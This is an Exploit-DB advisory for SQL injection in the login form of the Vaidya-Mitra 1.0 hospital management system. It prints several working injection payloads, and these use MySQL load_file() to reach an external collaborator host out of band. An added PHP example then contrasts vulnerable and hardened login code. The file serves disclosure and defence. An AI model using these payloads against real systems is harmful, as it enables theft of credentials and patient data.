exploit-db-mirror/exploits/php/webapps/51596.txt
Exploit-DB 3a3c03321c DB: 2023-07-20
2023-07-20 00:16:46 +00:00

## Title: Vaidya-Mitra 1.0 - Multiple SQLi
## Author: nu11secur1ty
## Date: 07.12.2023
## Vendor: https://mayurik.com/
## Software: free:
https://www.sourcecodester.com/php/16720/free-hospital-management-system-small-practices.html,
https://mayurik.com/source-code/P5890/best-hospital-management-system-in-php
## Reference: https://portswigger.net/web-security/sql-injection
## Description:
The `useremail` parameter of the login request appears to be vulnerable to SQL injection. The payload `'+(select load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+'` was submitted in the `useremail` parameter. It injects a SQL sub-query that calls MySQL's `load_file()` function with a UNC path whose host lies on an external, attacker-controlled domain (an out-of-band collaborator). The application's database server then interacted with that domain, indicating that the injected SQL query was executed. An attacker can easily extract all information held by this system, such as login credentials and phone numbers.
STATUS: HIGH Vulnerability
[+]Payload:
```mysql
---
Parameter: useremail (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: useremail=mayuri.infospace@gmail.com'+(select load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+'' RLIKE (SELECT (CASE WHEN (5532=5532) THEN 0x6d61797572692e696e666f737061636540676d61696c2e636f6d+(select load_file(0x5c5c5c5c6c726730667377767533773131677039727237656b33623734796172796c6d637030686e3762772e6f6173746966792e636f6d5c5c6d6576))+'' ELSE 0x28 END)) AND 'tsyu'='tsyu&userpassword=rootadmin

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: useremail=mayuri.infospace@gmail.com'+(select load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+'' AND (SELECT 3518 FROM(SELECT COUNT(*),CONCAT(0x716a766a71,(SELECT (ELT(3518=3518,1))),0x71626a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'gHln'='gHln&userpassword=rootadmin

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)
    Payload: useremail=mayuri.infospace@gmail.com'+(select load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+'' OR (SELECT 4396 FROM (SELECT(SLEEP(3)))iEbq) AND 'ZWBa'='ZWBa&userpassword=rootadmin
---
```
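The root cause behind the payloads above is user input concatenated into the login query. What follows is an added illustration, not code from Vaidya-Mitra or from the advisory's author: a hypothetical login handler (`login_vulnerable`, with an assumed `users` table holding `email`, `password` and `password_hash` columns) written in the concatenating style that lets a quote in `useremail` change the query, beside a hardened version (`login_hardened`) that uses a PDO prepared statement and verifies the password hash in PHP rather than inside SQL. The demo runs against an in-memory SQLite database with constructed sample data; the only input it feeds in is the shape of the advisory's payload with the collaborator host replaced by a placeholder.

```php
<?php
// Added illustration (not the Vaidya-Mitra code base): a hypothetical login
// handler in the concatenating style the advisory describes, beside a
// hardened version. Table and column names are assumed.
declare(strict_types=1);

// Vulnerable shape: input spliced into the SQL text. A single quote in
// $useremail closes the string literal and the remainder is parsed as SQL,
// which is what lets  '+(select load_file(...))+'  run as a sub-query.
function login_vulnerable(PDO $db, string $useremail, string $userpassword): ?array
{
    $sql = "SELECT id, email FROM users WHERE email = '$useremail' "
         . "AND password = '$userpassword'";
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row ?: null;
}

// Hardened shape: the query text is fixed, values travel as parameters, and
// the password is checked against a stored hash in PHP, never inside SQL.
function login_hardened(PDO $db, string $useremail, string $userpassword): ?array
{
    // Cheap sanity check; the real defence is the prepared statement below.
    if (filter_var($useremail, FILTER_VALIDATE_EMAIL) === false) {
        return null;
    }
    $stmt = $db->prepare('SELECT id, email, password_hash FROM users WHERE email = :email');
    $stmt->execute([':email' => $useremail]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($userpassword, $row['password_hash'])) {
        return null;
    }
    unset($row['password_hash']);
    return $row;
}

// --- Demo on an in-memory SQLite database with constructed sample data ---
$db = new PDO('sqlite::memory:', null, null, [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false, // on MySQL this selects server-side prepares
]);
// The plaintext `password` column exists only so the vulnerable function can
// run; the hardened function reads `password_hash` alone.
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, password TEXT, password_hash TEXT)');
$ins = $db->prepare('INSERT INTO users (email, password, password_hash) VALUES (?, ?, ?)');
$ins->execute(['alice@example.com', 'correct horse', password_hash('correct horse', PASSWORD_DEFAULT)]);

// Same shape as the advisory's payload; the collaborator host is a placeholder.
$injected = <<<'PAYLOAD'
alice@example.com'+(select load_file('\\\\PLACEHOLDER.example\\mev'))+'
PAYLOAD;

try {
    login_vulnerable($db, $injected, 'x');
} catch (PDOException $e) {
    // The quote escaped the literal: the injected sub-query reached the parser.
    echo "vulnerable: injected SQL reached the database -> " . $e->getMessage() . "\n";
}

// Hardened path: the same input is compared as data and matches nothing,
// while a genuine credential pair still logs in.
var_dump(login_hardened($db, $injected, 'x'));
var_dump(login_hardened($db, 'alice@example.com', 'correct horse'));
```

Run it with `php login_example.php` (the filename is arbitrary). On the vulnerable path the database reports an error for the injected sub-query (SQLite has no `load_file`; on MySQL the same position is where the `load_file()` call that produced the out-of-band interaction would execute), while on the hardened path the identical input is bound as a value and simply finds no row. Two server-side controls also limit the impact of this bug class even where a query remains injectable: keep MySQL's `secure_file_priv` restricted, since it bounds what `LOAD_FILE()` may read, and do not grant the application's database account the `FILE` privilege, which `LOAD_FILE()` requires.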
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/Vaidya-Mitra-1.0)
## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/07/vaidya-mitra-10-multiple-sqli.html)
## Time spent:
00:27:00